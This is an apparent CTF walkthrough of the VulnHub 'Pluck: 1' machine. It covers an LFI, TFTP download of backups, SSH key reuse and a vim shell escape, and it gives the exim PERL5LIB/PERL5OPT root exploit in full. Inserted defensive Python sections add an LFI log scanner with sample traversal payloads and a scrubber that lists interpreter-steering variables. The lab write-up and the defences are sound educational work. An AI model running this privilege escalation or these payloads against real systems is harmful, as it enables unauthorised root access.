Capture the flag (CTF)

Pluck: 1 CTF Walkthrough

June 8, 2017, by Chiragh Dewan

Pluck: 1 is a vulnerable machine created by Ryan Oberto. It surfaced on VulnHub on 11th March 2017. It can be downloaded from https://www.vulnhub.com/entry/pluck-1,178/

The file can be used with VMWare as well as VirtualBox. The machine is Linux based.


The objective is to read the flag present in the machine with root privileges.

Once downloaded and booted, it presents a login screen which shows the target IP:

Since we have our target IP, let's scan and see what we can find:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:

  • Port 22 - Used for SSH
  • Port 80 - Used to serve a web application
  • Port 3306 - Running MySQL

Seeing that port 80 is open, my first instinct was to check what the server was running:

The shape of the URL (a page parameter naming a file) made me try for LFI (Local File Inclusion), and it worked:

http://172.16.92.142/index.php?page=about.php
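The page parameter above is the classic local file inclusion shape: the application takes a file name from the query string and includes it. As an added example (my own code, not part of the original walkthrough or of the Pluck VM), the Python below does two defender-side things: it scans web-server access-log lines for traversal sequences, absolute paths, null bytes and PHP stream wrappers in include-style parameters (decoding twice so double URL encoding is caught), and it shows the allowlist lookup that replaces handing user input to include(). The log lines, the parameter names, the page allowlist and the pages directory are all constructed for the demo.

```python
"""Added example (not from the original walkthrough or the Pluck VM): spotting
local file inclusion attempts in web logs and the allowlist that prevents them."""
from __future__ import annotations
import re
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters that applications commonly use to name a file to include
# (assumed list; extend it for your own application).
INCLUDE_PARAMS = {"page", "file", "include", "template", "view"}

# Shapes a legitimate page name never has: directory traversal, an absolute
# path, a null byte, or a PHP stream wrapper.
LFI_PATTERNS = [
    re.compile(r"\.\./|\.\.\\"),
    re.compile(r"^/"),
    re.compile(r"\x00"),
    re.compile(r"^(php|file|data|expect|zip|phar)://", re.IGNORECASE),
]

# Common Apache/nginx combined-log prefix: client, ident, user, time, request, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_twice(value: str) -> str:
    """Decode twice so double-encoded traversal (%252e%252e%252f) is seen as ../ too."""
    return unquote(unquote(value))


def lfi_indicators(request_path: str) -> list[str]:
    """Return 'name=value' for each include-style parameter that looks like LFI."""
    query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    hits = []
    for name, values in query.items():
        if name.lower() not in INCLUDE_PARAMS:
            continue
        for raw in values:
            if any(p.search(decode_twice(raw)) for p in LFI_PATTERNS):
                hits.append(f"{name}={raw}")
    return hits


def scan_access_log(lines) -> list[tuple[str, str, str]]:
    """Return (client_ip, status, indicator) for every request that looks like LFI.
    A 200 on a traversal request is the alert; a 403/404 is still worth noting."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for hit in lfi_indicators(m.group("path")):
            findings.append((m.group("ip"), m.group("status"), hit))
    return findings


# Hardened counterpart of index.php?page=<file>: the request carries only a
# key, and the key is looked up in a fixed map. User input never becomes a path.
PAGE_ALLOWLIST = {"home": "index.php", "about": "about.php", "contact": "contact.php"}
PAGES_DIR = Path("/var/www/html/pages")  # assumed location


def safe_page(key: str) -> Path | None:
    """Return the file to include for `key`, or None if the key is not known."""
    name = PAGE_ALLOWLIST.get(key)
    return PAGES_DIR / name if name else None


# Constructed sample log lines (not taken from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Mar/2017:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Mar/2017:10:00:07 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [11/Mar/2017:10:00:09 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [11/Mar/2017:10:00:12 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096',
    '10.0.0.7 - - [11/Mar/2017:10:01:00 +0000] "GET /static/logo.png HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, status, hit in scan_access_log(SAMPLE_LOG):
        print(f"possible LFI from {ip} (HTTP {status}): {hit}")
```

Run against the constructed log it reports the three requests from 10.0.0.9 and ignores the legitimate page=about.php request. The same allowlist idea ported to PHP (a fixed array of key to file, then include of the looked-up value) is what closes the hole in an index.php like the one above.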

The output mentions a user called backup-user whose job is to take periodic backups and store them. Let's see what it shows us:

To get the backup.tar file, I connected with TFTP (Trivial File Transfer Protocol) and downloaded it:

$ tftp
tftp> connect 172.16.92.142
tftp> get backup.tar
tftp> quit

$ tar -xvf backup.tar

On extracting the contents of backup.tar, we see there are two folders:

  • Home
  • Var

On further examination, we see that the user Paul has a few keys up his sleeve:

Let's try to use them and see if any of them works. After trying a few, id_key4 showed the following:

$ ssh -i id_key4 paul@172.16.92.142

Here we are presented with pdmenu. To get to a shell, choose Edit file and enter any file name. You will be dropped into vim; to escape to a shell, type:

:set shell=/bin/bash

and then type :shell to get a shell.

Checking about the user and the system, we find:

Now, to read the flag, we need root privileges. After some research, I found the following exploit (https://www.exploit-db.com/exploits/39535/). Simply copying and pasting the following gave us root:

cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps


and voila, we have the flag:
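What makes the copy-and-paste above work is that exim runs as a setuid-root binary with embedded Perl, and the Perl interpreter honours PERL5LIB and PERL5OPT from the caller's environment, so an unprivileged user can have a root process load a module they wrote. The fixed Exim releases clean the process environment by default. As an added example (my own code, not from the walkthrough and not Exim's), the Python below applies that principle to any privileged helper: it keeps only an allowlist of variables, resets PATH, reports what was dropped, and checks the result by spawning a child and reading back the environment it actually received. The variable lists and the constructed dirty environment are assumptions for the demo.

```python
"""Added example (not from the original walkthrough or from Exim): scrub
interpreter-steering variables out of the environment before a privileged
helper runs. This is the defence that closes the PERL5LIB/PERL5OPT trick."""
from __future__ import annotations
import json
import subprocess
import sys

# Prefixes and names of variables that change what an interpreter or the
# dynamic loader executes. A privileged process must never inherit these.
DANGEROUS_PREFIXES = ("PERL5", "LD_", "PYTHON", "RUBY")
DANGEROUS_NAMES = {"NODE_OPTIONS", "BASH_ENV", "ENV", "IFS"}

# Allowlist of variables a privileged helper normally still needs (assumed).
KEEP = {"HOME", "LANG", "TZ", "TERM"}
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def flag_dangerous(env: dict[str, str]) -> list[str]:
    """Denylist view, useful for auditing: names that would steer an interpreter."""
    return sorted(k for k in env
                  if k.startswith(DANGEROUS_PREFIXES) or k in DANGEROUS_NAMES)


def scrub_env(env: dict[str, str]) -> tuple[dict[str, str], list[str]]:
    """Allowlist view, used before exec: keep only KEEP and always reset PATH.

    Returns (clean_env, dropped_names). Allowlisting beats denylisting here
    because the set of dangerous variables is open-ended (new interpreters,
    new loader knobs) while the set a helper needs is small and known."""
    clean = {k: v for k, v in env.items() if k in KEEP}
    clean["PATH"] = SAFE_PATH  # PATH is reset, not inherited
    dropped = sorted(k for k in env if k not in KEEP and k != "PATH")
    return clean, dropped


def run_privileged(argv: list[str], env: dict[str, str]) -> subprocess.CompletedProcess:
    """Spawn argv with a scrubbed copy of env; the caller's own env is untouched.
    A real setuid helper would also drop privileges it does not need here;
    only the environment handling is demonstrated."""
    clean, _ = scrub_env(env)
    return subprocess.run(argv, env=clean, capture_output=True, text=True, check=True)


def child_env_names(env: dict[str, str]) -> list[str]:
    """Spawn a throwaway Python child with the scrubbed env and report what it sees."""
    proc = run_privileged(
        [sys.executable, "-c", "import json, os; print(json.dumps(sorted(os.environ)))"],
        env,
    )
    return json.loads(proc.stdout)


# Constructed "dirty" environment modelled on the escalation above (not real data).
DIRTY_ENV = {
    "PATH": "/tmp:/usr/local/bin:/usr/bin",
    "HOME": "/home/paul",
    "PERL5LIB": "/tmp",
    "PERL5OPT": "-Mroot",
    "LD_PRELOAD": "/tmp/evil.so",
}

if __name__ == "__main__":
    print("dangerous:", flag_dangerous(DIRTY_ENV))
    clean, dropped = scrub_env(DIRTY_ENV)
    print("dropped:", dropped)
    print("child sees:", child_env_names(DIRTY_ENV))
```

The audit view (flag_dangerous) is what you would run over a suspicious shell's environment or a cron job definition; the allowlist (scrub_env) is what belongs in the code path that actually executes something with more privilege than the caller.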



Chiragh Dewan

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/Ethical Hacking, as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc. for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security, including at a TEDx event.